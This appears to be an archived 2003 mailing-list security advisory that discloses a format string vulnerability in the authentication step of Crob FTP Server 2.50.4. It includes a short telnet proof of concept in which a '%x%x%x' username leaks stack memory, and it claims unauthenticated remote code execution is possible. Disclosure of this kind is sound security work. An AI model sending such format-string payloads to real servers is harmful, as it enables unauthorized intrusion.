('binary' encoding is not supported, stored as-is) Package: Crob Ftp Server Auth: Crob Software Studio (www.crob.net/studio/ftpserver/) Version: 2.50.4 Build 228 Vulnerability: Format String Risk: High Vulnerability Description: A format string flaw in the authentication process allows remote attackers without valid user/pass to execute arbitrary code. C:\>telnet 192.168.0.1 21 220- Crob FTP Server V2.50.4 220 Welcome to Crob FTP Server user %x%x%x 331 Password required for 0d1250b70 Luca Ercoli luca.ercoli[at]inwind.it
This archive was generated by hypermail 2b30 : Mon Jun 02 2003 - 10:12:43 PDT